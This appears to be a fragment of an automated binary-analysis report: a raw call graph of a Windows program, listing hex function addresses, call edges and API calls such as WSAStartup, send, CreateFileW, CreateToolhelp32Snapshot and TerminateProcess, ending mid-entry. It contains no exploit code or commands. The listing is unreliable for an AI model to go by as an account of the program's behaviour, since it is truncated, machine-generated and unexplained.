104566->104568 104567->104551 104568->104121 104739 76ca8e 104569->104739 104572 771606 104571->104572 104575 7714b2 104571->104575 104572->104150 104573 7714be 104580 7714c9 104573->104580 104865 76346e 48 API calls 104573->104865 104575->104573 104576 78010a 48 API calls 104575->104576 104577 7d5299 104576->104577 104579 78010a 48 API calls 104577->104579 104578 77156d 104578->104150 104586 7d52a4 104579->104586 104580->104578 104581 78010a 48 API calls 104580->104581 104582 7715af 104581->104582 104583 7715c2 104582->104583 104864 77d6b4 48 API calls 104582->104864 104583->104150 104585 78010a 48 API calls 104585->104586 104586->104573 104586->104585 104587->104110 104588->104145 104589->104145 104590->104116 104591->104145 104592->104111 104593->104116 104594->104116 104595->104127 104596->104161 104598 774537 104597->104598 104599 77469f 104597->104599 104600 774543 104598->104600 104601 7d7820 104598->104601 104602 76caee 48 API calls 104599->104602 104866 774040 104600->104866 105043 7be713 415 API calls Mailbox 104601->105043 104609 7745e4 Mailbox 104602->104609 104605 7d782c 104606 774639 Mailbox 104605->104606 105044 7ad520 86 API calls 4 library calls 104605->105044 104606->104121 104608 774559 104608->104605 104608->104606 104608->104609 104612 7c1f19 132 API calls 104609->104612 104881 7adce9 104609->104881 104886 7b6fc3 104609->104886 104889 7aefcd 104609->104889 104923 7b1080 104609->104923 104926 7650ec 104609->104926 104930 7b9500 104609->104930 104939 7b90d3 104609->104939 104944 77f55e 104609->104944 104953 7c352a 104609->104953 105041 7b95af WSAStartup 104609->105041 104612->104606 104621->104155 104622->104160 104623->104165 105598 76a9a0 104624->105598 104626 7736e7 104627 7da269 104626->104627 104628 773778 104626->104628 104687 773aa8 104626->104687 105615 7ad520 86 API calls 4 library calls 104627->105615 105610 77bc04 86 API calls 104628->105610 104629 773ab5 Mailbox 104629->104121 104633 7da68d 104633->104687 105636 7ad520 86 API calls 4 library calls 104633->105636 104634 7da289 104683 7da3e9 104634->104683 105616 76d2d2 104634->105616 104636 773793 104636->104633 104685 77396b Mailbox _memmove 104636->104685 104636->104687 105603 7610e8 104636->105603 104637 77bc5c 48 API calls 104637->104685 104641 7da583 104644 76fa40 415 API calls 104641->104644 104642 7da45c 105630 7ad520 86 API calls 4 library calls 104642->105630 104647 7da5b5 104644->104647 104646 77384e 104654 7da60c 104646->104654 104655 7738e5 104646->104655 104646->104685 104657 76d380 55 API calls 104647->104657 104647->104687 104651 7da40f 105627 77cf79 49 API calls 104651->105627 104652 7da303 104659 7da317 104652->104659 104669 7da341 104652->104669 105635 7ad231 50 API calls 104654->105635 104660 78010a 48 API calls 104655->104660 104661 7da5e6 104657->104661 105622 7ad520 86 API calls 4 library calls 104659->105622 104676 7738ec 104660->104676 105634 7ad520 86 API calls 4 library calls 104661->105634 104662 76fa40 415 API calls 104662->104685 104664 7da42c 104666 7da44d 104664->104666 104667 7da441 104664->104667 105629 7ad520 86 API calls 4 library calls 104666->105629 105628 7ad520 86 API calls 4 library calls 104667->105628 104673 7da366 104669->104673 104677 7da384 104669->104677 104670 78010a 48 API calls 104670->104685 105623 7bf211 415 API calls 104673->105623 104674 76d89e 50 API calls 104674->104685 104680 76e1f0 415 API calls 104676->104680 104681 77399f 104676->104681 104678 7da37a 104677->104678 105624 7bf4df 415 API calls 104677->105624 104678->104687 105625 77baef 48 API calls _memmove 104678->105625 104680->104685 104684 76c935 48 API calls 104681->104684 104686 7739c0 104681->104686 105626 7ad520 86 API calls 4 library calls 104683->105626 104684->104686 104685->104634 104685->104637 104685->104641 104685->104642 104685->104661 104685->104662 104685->104670 104685->104674 104685->104681 104685->104687 105611 76d500 53 API calls __cinit 104685->105611 105612 76d420 53 API calls 104685->105612 105613 77baef 48 API calls _memmove 104685->105613 105631 7bd21a 82 API calls Mailbox 104685->105631 105632 7a89e0 53 API calls 104685->105632 105633 76d772 55 API calls 104685->105633 104686->104687 104689 7da65e 104686->104689 104691 773a05 104686->104691 104687->104629 105614 7ad520 86 API calls 4 library calls 104687->105614 104690 76d89e 50 API calls 104689->104690 104690->104633 104691->104633 104691->104687 104692 773a95 104691->104692 104693 76d89e 50 API calls 104692->104693 104693->104687 104694->104121 104695->104135 104697 7684be 104696->104697 104714 7684ba 104696->104714 104698 7d5592 __i64tow 104697->104698 104699 7684d2 104697->104699 104700 7d5494 104697->104700 104708 7684ea __itow Mailbox _wcscpy 104697->104708 105640 78234b 80 API calls 3 library calls 104699->105640 104701 7d549d 104700->104701 104702 7d557a 104700->104702 104707 7d54bc 104701->104707 104701->104708 105641 78234b 80 API calls 3 library calls 104702->105641 104705 78010a 48 API calls 104706 7684f4 104705->104706 104710 76caee 48 API calls 104706->104710 104706->104714 104709 78010a 48 API calls 104707->104709 104708->104705 104712 7d54d9 104709->104712 104710->104714 104711 78010a 48 API calls 104713 7d54ff 104711->104713 104712->104711 104713->104714 104715 76caee 48 API calls 104713->104715 104714->104154 104715->104714 104716->104143 104753 78010a 104717->104753 104719 76d3f3 104720 78010a 48 API calls 104719->104720 104721 76d401 104720->104721 104721->104550 104723 7bcd21 104722->104723 104727 7bcd46 104722->104727 104724 76ca8e 48 API calls 104723->104724 104725 7bcd2d 104724->104725 104784 7bc8b7 104725->104784 104727->104561 104729 767ecf 104728->104729 104730 767e5f __wsetenvp 104728->104730 104852 76a2fb 104729->104852 104732 767ec7 104730->104732 104733 767e7b 104730->104733 104851 767eda 48 API calls 104732->104851 104848 76a6f8 104733->104848 104736 767e85 _memmove 104736->104556 104737->104560 104738->104568 104740 76cad0 104739->104740 104745 76ca9a 104739->104745 104741 76cae3 104740->104741 104742 76cad9 104740->104742 104860 76c4cd 104741->104860 104743 767e53 48 API calls 104742->104743 104750 76cac6 104743->104750 104746 78010a 48 API calls 104745->104746 104747 76caad 104746->104747 104748 7d4f11 104747->104748 104749 76cab8 104747->104749 104748->104750 104752 76d3d2 48 API calls 104748->104752 104749->104750 104751 76caee 48 API calls 104749->104751 104750->104568 104751->104750 104752->104750 104756 780112 __calloc_impl 104753->104756 104755 78012c 104755->104719 104756->104755 104757 78012e std::exception::exception 104756->104757 104762 7845ec 104756->104762 104776 787495 RaiseException 104757->104776 104759 780158 104777 7873cb 47 API calls _free 104759->104777 104761 78016a 104761->104719 104763 784667 __calloc_impl 104762->104763 104766 7845f8 __calloc_impl 104762->104766 104783 78889e 47 API calls __getptd_noexit 104763->104783 104764 784603 104764->104766 104778 788e52 47 API calls 2 library calls 104764->104778 104779 788eb2 47 API calls 8 library calls 104764->104779 104780 781d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 104764->104780 104766->104764 104768 78462b RtlAllocateHeap 104766->104768 104771 784653 104766->104771 104774 784651 104766->104774 104768->104766 104770 78465f 104768->104770 104770->104756 104781 78889e 47 API calls __getptd_noexit 104771->104781 104782 78889e 47 API calls __getptd_noexit 104774->104782 104776->104759 104777->104761 104778->104764 104779->104764 104781->104774 104782->104770 104783->104770 104786 7bc914 104784->104786 104787 7bc8f7 104784->104787 104842 7bc235 415 API calls Mailbox 104786->104842 104787->104786 104788 7bcc61 104787->104788 104789 7bc934 104787->104789 104790 7bcca9 104788->104790 104791 7bcc6e 104788->104791 104789->104786 104820 79abf3 104789->104820 104790->104786 104795 7bccb6 104790->104795 104838 77d6b4 48 API calls 104791->104838 104793 7bc964 104793->104786 104796 7bc973 104793->104796 104840 77d6b4 48 API calls 104795->104840 104806 7bc9a1 104796->104806 104824 79a8c8 104796->104824 104797 7bcc87 104839 7a97b6 89 API calls 104797->104839 104801 7bccd6 104841 7a503c 91 API calls Mailbox 104801->104841 104803 7bcadc VariantInit 104811 7bcb11 _memset 104803->104811 104807 7bca4a 104806->104807 104834 79a25b 106 API calls 104806->104834 104807->104803 104808 7bca86 VariantClear 104807->104808 104808->104807 104809 7bcaa5 SysAllocString 104808->104809 104809->104807 104810 7bcb8e 104811->104810 104812 7bcbb4 104811->104812 104817 7bcc52 104817->104727 104821 79ac04 __wsetenvp 104820->104821 104823 79ac16 104820->104823 104821->104823 104843 763bcf 104821->104843 104823->104793 104826 79a8f2 104824->104826 104825 79a9ed SysFreeString 104833 79a9f9 104825->104833 104826->104825 104827 79a90a 104826->104827 104828 79aa7e 104826->104828 104826->104833 104827->104806 104828->104827 104829 79aad9 SysFreeString 104828->104829 104830 79aac9 lstrcmpiW 104828->104830 104828->104833 104829->104828 104830->104829 104832 79aafa SysFreeString 104830->104832 104832->104833 104833->104827 104847 79a78a RaiseException 104833->104847 104834->104806 104838->104797 104839->104817 104840->104801 104841->104817 104842->104817 104844 763bd9 __wsetenvp 104843->104844 104845 78010a 48 API calls 104844->104845 104846 763bee _wcscpy 104845->104846 104846->104823 104847->104833 104849 78010a 48 API calls 104848->104849 104850 76a702 104849->104850 104850->104736 104851->104736 104853 76a309 104852->104853 104855 76a321 _memmove 104852->104855 104853->104855 104856 76b8a7 104853->104856 104855->104736 104857 76b8ba 104856->104857 104859 76b8b7 _memmove 104856->104859 104858 78010a 48 API calls 104857->104858 104858->104859 104859->104855 104861 76c4e7 104860->104861 104862 76c4da 104860->104862 104863 78010a 48 API calls 104861->104863 104862->104750 104863->104862 104864->104583 104865->104580 104867 7d787b 104866->104867 104870 77406c 104866->104870 105046 7ad520 86 API calls 4 library calls 104867->105046 104869 7d788c 105047 7ad520 86 API calls 4 library calls 104869->105047 104870->104869 104877 7740a6 _memmove 104870->104877 104872 774175 104878 774185 104872->104878 105045 7bd21a 82 API calls Mailbox 104872->105045 104874 78010a 48 API calls 104874->104877 104875 7741f1 104875->104608 104876 76fa40 415 API calls 104876->104877 104877->104872 104877->104874 104877->104876 104877->104878 104879 7d78d8 104877->104879 104878->104608 105048 7ad520 86 API calls 4 library calls 104879->105048 104882 7684a6 81 API calls 104881->104882 104883 7adcfc 104882->104883 105049 7a6d6d 104883->105049 104885 7add06 104885->104606 104887 7684a6 81 API calls 104886->104887 104888 7b6fd6 SetWindowTextW 104887->104888 104888->104606 104890 7684a6 81 API calls 104889->104890 104891 7aeff2 104890->104891 105061 7a78ad GetFullPathNameW 104891->105061 104896 7af04b CoInitialize CoCreateInstance 104898 7af08e 104896->104898 104899 7af070 104896->104899 104900 7684a6 81 API calls 104898->104900 104902 7af07a CoUninitialize 104899->104902 104901 7af09d 104900->104901 104903 7af0c1 104901->104903 104904 7684a6 81 API calls 104901->104904 104912 7af23c Mailbox 104902->104912 104905 7af0e5 104903->104905 104906 7684a6 81 API calls 104903->104906 104904->104903 104906->104905 104912->104606 105087 7b22e5 104923->105087 104925 7b1090 104925->104606 104927 7650f6 104926->104927 104928 765105 104926->104928 104927->104606 104928->104927 104929 76510a CloseHandle 104928->104929 104929->104927 104931 76cdb4 48 API calls 104930->104931 104932 7b9515 104931->104932 104933 7abe47 50 API calls 104932->104933 104934 7b9522 104933->104934 104935 7b952f send 104934->104935 104936 7b9546 104935->104936 104937 7b9552 WSAGetLastError 104936->104937 104938 7b956a 104936->104938 104937->104938 104938->104606 104940 76cdb4 48 API calls 104939->104940 104941 7b90e6 closesocket 104940->104941 104942 7b90f1 WSAGetLastError 104941->104942 104943 7b9106 104941->104943 104942->104943 104943->104606 104945 76cdb4 48 API calls 104944->104945 104946 77f572 104945->104946 104947 7d75d1 Sleep 104946->104947 104948 77f57a timeGetTime 104946->104948 104949 76cdb4 48 API calls 104948->104949 104950 77f590 104949->104950 105276 76e1f0 104950->105276 104954 76d3d2 48 API calls 104953->104954 104955 7c354a 104954->104955 104956 76d3d2 48 API calls 104955->104956 104957 7c3553 104956->104957 104958 76d3d2 48 API calls 104957->104958 104959 7c355c 104958->104959 104960 7684a6 81 API calls 104959->104960 104968 7c35e9 Mailbox 104959->104968 104961 7c3580 104960->104961 105541 7c3d7b 104961->105541 104968->104606 105042 7b95e0 105041->105042 105042->104606 105043->104605 105044->104606 105045->104875 105046->104869 105047->104878 105048->104878 105051 7a6d8a __wsetenvp 105049->105051 105050 7a6db3 GetFileAttributesW 105052 7a6dc5 GetLastError 105050->105052 105060 7a6de3 105050->105060 105051->105050 105053 7a6dd0 CreateDirectoryW 105052->105053 105054 7a6de7 105052->105054 105053->105054 105053->105060 105055 763bcf 48 API calls 105054->105055 105054->105060 105056 7a6df7 _wcsrchr 105055->105056 105057 7a6d6d 48 API calls 105056->105057 105056->105060 105058 7a6e1b 105057->105058 105059 7a6e28 CreateDirectoryW 105058->105059 105058->105060 105059->105060 105060->104885 105062 767e53 48 API calls 105061->105062 105063 7a78df 105062->105063 105080 77e617 105063->105080 105066 7b267a 105067 7b26a4 __wsetenvp 105066->105067 105068 7af039 105067->105068 105069 7b26d8 105067->105069 105071 7b2763 105067->105071 105068->104896 105073 7639e8 48 API calls 2 library calls 105068->105073 105069->105068 105084 77dfd2 60 API calls 105069->105084 105071->105068 105085 77dfd2 60 API calls 105071->105085 105073->104896 105081 77e625 105080->105081 105082 76a2fb 48 API calls 105081->105082 105083 77e635 105082->105083 105083->105066 105084->105069 105085->105071 105088 7b2306 105087->105088 105089 7b230a 105088->105089 105090 7b2365 105088->105090 105091 78010a 48 API calls 105089->105091 105156 77f0f3 48 API calls 105090->105156 105093 7b2311 105091->105093 105094 7b231f 105093->105094 105143 765080 49 API calls 105093->105143 105096 7684a6 81 API calls 105094->105096 105098 7b2331 105096->105098 105097 7b2379 105099 7b234d 105097->105099 105101 7b243f 105097->105101 105103 7b23bb 105097->105103 105144 764bf9 105098->105144 105099->104925 105159 7abe47 105101->105159 105107 7684a6 81 API calls 105103->105107 105105 7b2446 105163 7a689f SetFilePointerEx SetFilePointerEx WriteFile 105105->105163 105106 7b2341 105106->105099 105155 764592 CloseHandle 105106->105155 105114 7b23c2 105107->105114 105109 7b23f6 105125 7a67dc 105109->105125 105112 7b2400 105157 767b6e 48 API calls 105112->105157 105114->105109 105114->105112 105115 7b2410 105116 76c935 48 API calls 105115->105116 105117 7b241a 105116->105117 105158 7639e8 48 API calls 2 library calls 105117->105158 105119 7b23fe Mailbox 105119->105099 105121 7650ec CloseHandle 105119->105121 105120 7b2428 105122 7a67dc 55 API calls 105120->105122 105123 7b2490 105121->105123 105122->105119 105164 764592 CloseHandle 105123->105164 105126 7a67ec 105125->105126 105127 7a67f6 105125->105127 105181 7a6917 SetFilePointerEx SetFilePointerEx WriteFile 105126->105181 105129 7a6808 105127->105129 105130 7a67fc 105127->105130 105132 7a6811 105129->105132 105133 7a6824 105129->105133 105182 7a68b9 51 API calls 105130->105182 105135 76a6d4 48 API calls 105132->105135 105165 76a6d4 105133->105165 105134 7a67f4 Mailbox 105134->105119 105137 7a6816 105135->105137 105183 7a66f8 50 API calls 105137->105183 105141 7a6822 105143->105094 105145 7650ec CloseHandle 105144->105145 105146 764c04 105145->105146 105221 764b88 105146->105221 105149 764c44 105149->105097 105149->105106 105155->105099 105156->105097 105157->105115 105158->105120 105160 7abe50 105159->105160 105162 7abe55 105159->105162 105275 7aae06 50 API calls 2 library calls 105160->105275 105162->105105 105163->105119 105164->105099 105166 78010a 48 API calls 105165->105166 105167 76a6e7 105166->105167 105168 76a6f8 48 API calls 105167->105168 105169 76a6f4 105168->105169 105181->105134 105182->105134 105183->105141 105222 764ba1 CreateFileW 105221->105222 105223 7d4957 105221->105223 105224 764bc3 105222->105224 105223->105224 105225 7d495d CreateFileW 105223->105225 105224->105149 105228 764df0 105224->105228 105225->105224 105226 7d4983 105225->105226 105250 764ee9 105226->105250 105229 764e10 105228->105229 105230 764ee9 2 API calls 105229->105230 105237 764e69 105229->105237 105238 764ebd 105229->105238 105231 764e48 105230->105231 105257 764f03 105250->105257 105275->105162 105277 76e216 105276->105277 105337 76e226 Mailbox 105276->105337 105278 76e670 105277->105278 105277->105337 105406 77ecee 415 API calls 105278->105406 105280 76e4fd 105280->104606 105282 76e681 105282->105280 105284 76e68e 105282->105284 105283 76e26c PeekMessageW 105283->105337 105408 77ec33 415 API calls Mailbox 105284->105408 105286 7d5b13 Sleep 105286->105337 105287 76e695 LockWindowUpdate DestroyWindow GetMessageW 105287->105280 105290 76e6c7 105287->105290 105288 76e4e7 105288->105280 105407 76322e 16 API calls 105288->105407 105292 7d62a7 TranslateMessage DispatchMessageW GetMessageW 105290->105292 105292->105292 105293 7d62d7 105292->105293 105293->105280 105294 76e657 PeekMessageW 105294->105337 105295 78010a 48 API calls 105295->105337 105296 76e517 timeGetTime 105296->105337 105298 76c935 48 API calls 105298->105337 105299 76e641 TranslateMessage DispatchMessageW 105299->105294 105300 7d5dfc WaitForSingleObject 105302 7d5e19 GetExitCodeProcess CloseHandle 105300->105302 105300->105337 105301 7d6147 Sleep 105333 7d5cce Mailbox 105301->105333 105302->105337 105303 76d3d2 48 API calls 105303->105333 105304 76e6cc timeGetTime 105409 77cf79 49 API calls 105304->105409 105306 7d5feb Sleep 105306->105337 105310 761000 391 API calls 105310->105337 105312 7d61de GetExitCodeProcess 105315 7d620a CloseHandle 105312->105315 105316 7d61f4 WaitForSingleObject 105312->105316 105314 7d5cea Sleep 105314->105337 105315->105333 105316->105315 105316->105337 105317 7d5cd7 Sleep 105317->105314 105318 7c8a48 108 API calls 105318->105333 105320 761dce 107 API calls 105320->105337 105321 7d6266 Sleep 105321->105337 105322 77cf79 49 API calls 105322->105337 105325 76caee 48 API calls 105325->105333 105327 76fa40 391 API calls 105327->105337 105330 7744e0 391 API calls 105330->105337 105331 773680 391 API calls 105331->105337 105332 76caee 48 API calls 105332->105337 105333->105303 105333->105312 105333->105314 105333->105317 105333->105318 105333->105321 105333->105325 105333->105337 105411 7a56dc 49 API calls Mailbox 105333->105411 105412 77cf79 49 API calls 105333->105412 105413 76d380 105333->105413 105417 761000 415 API calls 105333->105417 105419 7bd12a 50 API calls 105333->105419 105420 7a8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105333->105420 105421 77e3a5 timeGetTime 105333->105421 105422 7a6f5b CreateToolhelp32Snapshot Process32FirstW 105333->105422 105335 7ad520 86 API calls 105335->105337 105336 76d380 55 API calls 105336->105337 105337->105283 105337->105286 105337->105288 105337->105294 105337->105295 105337->105296 105337->105298 105337->105299 105337->105300 105337->105301 105337->105304 105337->105306 105337->105310 105337->105314 105337->105320 105337->105322 105337->105327 105337->105330 105337->105331 105337->105332 105337->105333 105337->105335 105337->105336 105338 76e7e0 105337->105338 105345 76ea00 105337->105345 105395 77f381 105337->105395 105400 77ed1a 105337->105400 105405 76e7b0 415 API calls Mailbox 105337->105405 105410 7c8b20 48 API calls 105337->105410 105418 77e3a5 timeGetTime 105337->105418 105339 76e7fd 105338->105339 105341 76e80f 105338->105341 105429 76dcd0 105339->105429 105460 7ad520 86 API calls 4 library calls 105341->105460 105342 76e806 105342->105337 105344 7d98e8 105344->105344 105346 76ea20 105345->105346 105347 76fa40 415 API calls 105346->105347 105349 76ea89 105346->105349 105350 7d9919 105347->105350 105348 7d99bc 105475 7ad520 86 API calls 4 library calls 105348->105475 105354 76d3d2 48 API calls 105349->105354 105375 76eb18 105349->105375 105377 76ecd7 Mailbox 105349->105377 105350->105349 105472 7ad520 86 API calls 4 library calls 105350->105472 105353 76d3d2 48 API calls 105355 7d9997 105353->105355 105356 7d9963 105354->105356 105474 781b2a 52 API calls __cinit 105355->105474 105473 781b2a 52 API calls __cinit 105356->105473 105359 7d9d70 105484 7be2fb 415 API calls Mailbox 105359->105484 105361 76d380 55 API calls 105361->105377 105362 7d9dc2 105486 7ad520 86 API calls 4 library calls 105362->105486 105363 7d9ddf 105487 7bc235 415 API calls Mailbox 105363->105487 105365 76fa40 415 API calls 105365->105377 105366 76342c 48 API calls 105366->105377 105367 7d9e49 105489 7ad520 86 API calls 4 library calls 105367->105489 105370 7714a0 48 API calls 105370->105377 105374 7d9df7 105394 76ef0c Mailbox 105374->105394 105488 7ad520 86 API calls 4 library calls 105374->105488 105375->105353 105375->105377 105377->105348 105377->105359 105377->105361 105377->105362 105377->105363 105377->105365 105377->105366 105377->105367 105377->105370 105378 76f56f 105377->105378 105381 7ad520 86 API calls 105377->105381 105382 7d9a3c 105377->105382 105377->105394 105468 76d805 105377->105468 105476 7aa3ee 48 API calls 105377->105476 105477 7bede9 415 API calls 105377->105477 105482 79a599 InterlockedDecrement 105377->105482 105483 7bf4df 415 API calls 105377->105483 105378->105394 105485 7ad520 86 API calls 4 library calls 105378->105485 105381->105377 105478 7bd154 48 API calls 105382->105478 105384 7d9a48 105386 7d9a56 105384->105386 105387 7d9a9b 105384->105387 105479 7aa485 48 API calls 105386->105479 105390 7d9a91 Mailbox 105387->105390 105480 7aafce 48 API calls 105387->105480 105388 76fa40 415 API calls 105388->105394 105390->105388 105392 7d9ad8 105394->105337 105396 77f390 105395->105396 105398 7dee11 105395->105398 105396->105337 105397 7dee46 105398->105397 105399 7dee28 TranslateAcceleratorW 105398->105399 105399->105396 105401 77ed2c 105400->105401 105403 77ed34 105400->105403 105401->105337 105402 77ed5e IsDialogMessageW 105402->105401 105402->105403 105403->105401 105403->105402 105404 7debec GetClassLongW 105403->105404 105404->105402 105404->105403 105405->105337 105406->105288 105407->105282 105408->105287 105409->105337 105410->105337 105411->105333 105412->105333 105414 76d38b 105413->105414 105415 76d3b4 105414->105415 105490 76d772 55 API calls 105414->105490 105415->105333 105417->105333 105418->105337 105419->105333 105420->105333 105421->105333 105491 7a79c2 105422->105491 105424 7a7021 CloseHandle 105424->105333 105425 7a6fa4 Process32NextW 105425->105424 105427 7a6fa0 _wcscat 105425->105427 105427->105424 105427->105425 105497 78297d 105427->105497 105500 781bc7 105427->105500 105430 76fa40 415 API calls 105429->105430 105434 76dd0f _memmove 105430->105434 105432 7d8ddc 105432->105432 105433 76dd70 105433->105342 105434->105433 105435 76e12b Mailbox 105434->105435 105442 7d8dbe 105434->105442 105444 78010a 48 API calls 105434->105444 105446 76deb7 105434->105446 105455 76df29 105434->105455 105437 78010a 48 API calls 105435->105437 105436 76e051 105438 76e066 105436->105438 105439 7d8daf 105436->105439 105443 76decb _memmove 105437->105443 105440 78010a 48 API calls 105438->105440 105466 7bd1da 50 API calls 105439->105466 105453 76df64 105440->105453 105467 7ad520 86 API calls 4 library calls 105442->105467 105445 76def6 105443->105445 105447 78010a 48 API calls 105443->105447 105443->105455 105444->105434 105445->105455 105461 774320 415 API calls 105445->105461 105446->105435 105448 76dec4 105446->105448 105447->105445 105449 78010a 48 API calls 105448->105449 105449->105443 105450 7d8d9e 105465 7ad520 86 API calls 4 library calls 105450->105465 105453->105342 105455->105436 105455->105450 105455->105453 105456 7d8d76 105455->105456 105458 7d8d51 105455->105458 105462 765322 415 API calls 105455->105462 105464 7ad520 86 API calls 4 library calls 105456->105464 105463 7ad520 86 API calls 4 library calls 105458->105463 105460->105344 105461->105455 105462->105455 105463->105453 105464->105453 105465->105453 105466->105442 105467->105432 105469 76d828 _memmove 105468->105469 105470 76d815 105468->105470 105469->105377 105470->105469 105471 78010a 48 API calls 105470->105471 105471->105469 105472->105349 105473->105375 105474->105377 105475->105394 105476->105377 105477->105377 105478->105384 105479->105390 105480->105392 105482->105377 105483->105377 105484->105378 105485->105394 105486->105394 105487->105374 105488->105394 105489->105394 105490->105415 105492 7a79e9 105491->105492 105493 7a79d0 105491->105493 105511 78224a 58 API calls __wcstoi64 105492->105511 105493->105492 105496 7a79ef 105493->105496 105510 7822df GetStringTypeW wcstoxq 105493->105510 105496->105427 105512 7829c7 105497->105512 105501 781c48 105500->105501 105502 781bd3 105500->105502 105540 781c5a 59 API calls 3 library calls 105501->105540 105508 781bf8 105502->105508 105538 78889e 47 API calls __getptd_noexit 105502->105538 105505 781c55 105505->105427 105506 781bdf 105508->105427 105510->105493 105511->105496 105513 7829e2 105512->105513 105516 7829d6 105512->105516 105536 78889e 47 API calls __getptd_noexit 105513->105536 105515 782b9a 105516->105513 105519 782a55 105516->105519 105531 78a9fb 47 API calls __cftof2_l 105516->105531 105519->105513 105531->105519 105536->105515 105538->105506 105540->105505 105542 76c4cd 48 API calls 105541->105542 105543 7c3d89 105542->105543 105544 76c4cd 48 API calls 105543->105544 105545 7c3d91 105544->105545 105546 76c4cd 48 API calls 105545->105546 105547 7c3d99 105546->105547 105548 7c3e01 105547->105548 105588 76a4f6 105547->105588 105550 76c4cd 48 API calls 105548->105550 105554 7c3dff 105550->105554 105589 76b8a7 48 API calls 105588->105589 105599 76a9af 105598->105599 105602 76a9ca 105598->105602 105600 76b8a7 48 API calls 105599->105600 105601 76a9b7 CharUpperBuffW 105600->105601 105601->105602 105602->104626 105604 7d4c5a 105603->105604 105605 7610f9 105603->105605 105606 78010a 48 API calls 105605->105606 105607 761100 105606->105607 105608 761121 105607->105608 105637 76113c 48 API calls 105607->105637 105608->104646 105610->104636 105611->104685 105612->104685 105613->104685 105614->104629 105615->104636 105617 76d30a 105616->105617 105618 76d2df 105616->105618 105617->104651 105617->104652 105621 76d2e6 105618->105621 105639 76d349 53 API calls 105618->105639 105621->105617 105638 76d349 53 API calls 105621->105638 105622->104687 105623->104678 105624->104678 105625->104683 105626->104687 105627->104664 105628->104687 105629->104687 105630->104687 105631->104685 105632->104685 105633->104685 105634->104687 105635->104681 105636->104687 105637->105608 105638->105617 105639->105621 105640->104708 105641->104708 105642->104176 105643->104176 105644->104176 105645->104176 105646->104176 105647->104201 105648->104177 105649->104179 105650->104183 105651->104189 105652->104193 105654 7a7700 105653->105654 105665 7a76f9 _wcsncpy 105653->105665 105655 78010a 48 API calls 105654->105655 105656 7a7706 GetFileVersionInfoW 105655->105656 105657 7a7722 __wsetenvp 105656->105657 105658 78010a 48 API calls 105657->105658 105660 7a7739 _wcscat _wcscmp _wcscpy _wcsstr 105658->105660 105659 781bc7 _W_store_winword 59 API calls 105661 7a77f7 105659->105661 105663 7a7779 74D31560 105660->105663 105667 7a7793 _wcscat 105660->105667 105662 7a7827 74D31560 105661->105662 105661->105665 105664 7a783d _wcscmp 105662->105664 105662->105665 105663->105667 105664->105665 105668 78234b 80 API calls 3 library calls 105664->105668 105665->104228 105667->105659 105668->105665 105670 7d4a7d FindFirstFileW 105669->105670 105671 77dd89 105669->105671 105672 7d4a8e 105670->105672 105673 7d4a95 FindClose 105670->105673 105671->104077 105672->105673 105675 76d89e 50 API calls 105674->105675 105676 761a08 105675->105676 105677 7ddb7d 105676->105677 105678 761a12 105676->105678 105680 767e53 48 API calls 105677->105680 105679 7684a6 81 API calls 105678->105679 105681 761a1f 105679->105681 105682 7ddb8d 105680->105682 105683 76c935 48 API calls 105681->105683 105682->105682 105684 761a2d 105683->105684 105685 761dce 105684->105685 105686 761de4 Mailbox 105685->105686 105687 7ddb26 105686->105687 105690 761dfd 105686->105690 105688 7ddb2b IsWindow 105687->105688 105691 7ddb3f 105688->105691 105692 761e51 105688->105692 105689 761e46 105689->105692 105696 7ddb65 IsWindow 105689->105696 105690->105689 105694 7684a6 81 API calls 105690->105694 105776 76200a 105691->105776 105692->104242 105692->104243 105697 761e17 105694->105697 105696->105691 105696->105692 105723 761f04 105697->105723 105701 76c4cd 48 API calls 105700->105701 105702 79e2fe 105701->105702 105821 76193b SendMessageTimeoutW 105702->105821 105704 79e305 105705 79e309 Mailbox 105704->105705 105822 79e390 105704->105822 105705->104249 105707 79e314 105708 78010a 48 API calls 105707->105708 105709 79e338 SendMessageW 105708->105709 105709->105705 105710 79e34e _strlen 105709->105710 105711 79e378 105710->105711 105712 79e35a 105710->105712 105714 767e53 48 API calls 105711->105714 105827 79e0f5 48 API calls 2 library calls 105712->105827 105714->105705 105715 79e362 105718 767c3a 105717->105718 105720 767bfb 105717->105720 105719 76c935 48 API calls 105718->105719 105722 767c0e 105719->105722 105721 78010a 48 API calls 105720->105721 105721->105722 105722->104248 105724 761f1a Mailbox 105723->105724 105725 76c935 48 API calls 105724->105725 105726 761f3e 105725->105726 105727 76c935 48 API calls 105726->105727 105728 761f49 105727->105728 105729 767e53 48 API calls 105728->105729 105730 761f59 105729->105730 105731 76d3d2 48 API calls 105730->105731 105732 761f87 105731->105732 105733 76d3d2 48 API calls 105732->105733 105734 761f90 105733->105734 105735 76d3d2 48 API calls 105734->105735 105736 761f99 105735->105736 105737 7d2569 105736->105737 105738 761fac 105736->105738 105786 79e4ea 60 API calls 3 library calls 105737->105786 105739 7d2583 105738->105739 105741 761fbe GetForegroundWindow 105738->105741 105742 76a4f6 48 API calls 105739->105742 105743 76200a 48 API calls 105741->105743 105744 7d2597 105742->105744 105745 761fcc 105743->105745 105746 7d2899 105744->105746 105749 76a4f6 48 API calls 105744->105749 105747 76197e 48 API calls 105745->105747 105777 762016 105776->105777 105778 78010a 48 API calls 105777->105778 105779 762023 105778->105779 105780 76197e 105779->105780 105781 761990 105780->105781 105785 7619af _memmove 105780->105785 105783 78010a 48 API calls 105781->105783 105782 78010a 48 API calls 105784 7619c6 105782->105784 105783->105785 105784->105692 105785->105782 105786->105739 105821->105704 105847 76193b SendMessageTimeoutW 105822->105847 105824 79e39a 105825 79e39e 105824->105825 105826 79e3a2 SendMessageW 105824->105826 105825->105707 105826->105707 105827->105715 105847->105824 105848->104259 105849->104271 105850->104281 105851->104282 105853 7684a6 81 API calls 105852->105853 105854 7bf7db 105853->105854 105875 7bf81d Mailbox 105854->105875 105888 7c0458 105854->105888 105856 7bfa7c 105857 7bfbeb 105856->105857 105861 7bfa86 105856->105861 105934 7c0579 89 API calls Mailbox 105857->105934 105860 7bfbf8 105860->105861 105862 7bfc04 105860->105862 105901 7bf5fb 105861->105901 105862->105875 105863 7684a6 81 API calls 105881 7bf875 Mailbox 105863->105881 105868 7bfaba 105915 77f92c 105868->105915 105871 7bfaee 105922 763320 105871->105922 105872 7bfad4 105921 7ad520 86 API calls 4 library calls 105872->105921 105875->104296 105876 7bfb05 105878 7714a0 48 API calls 105876->105878 105887 7bfb2f 105876->105887 105877 7bfadf GetCurrentProcess TerminateProcess 105877->105871 105880 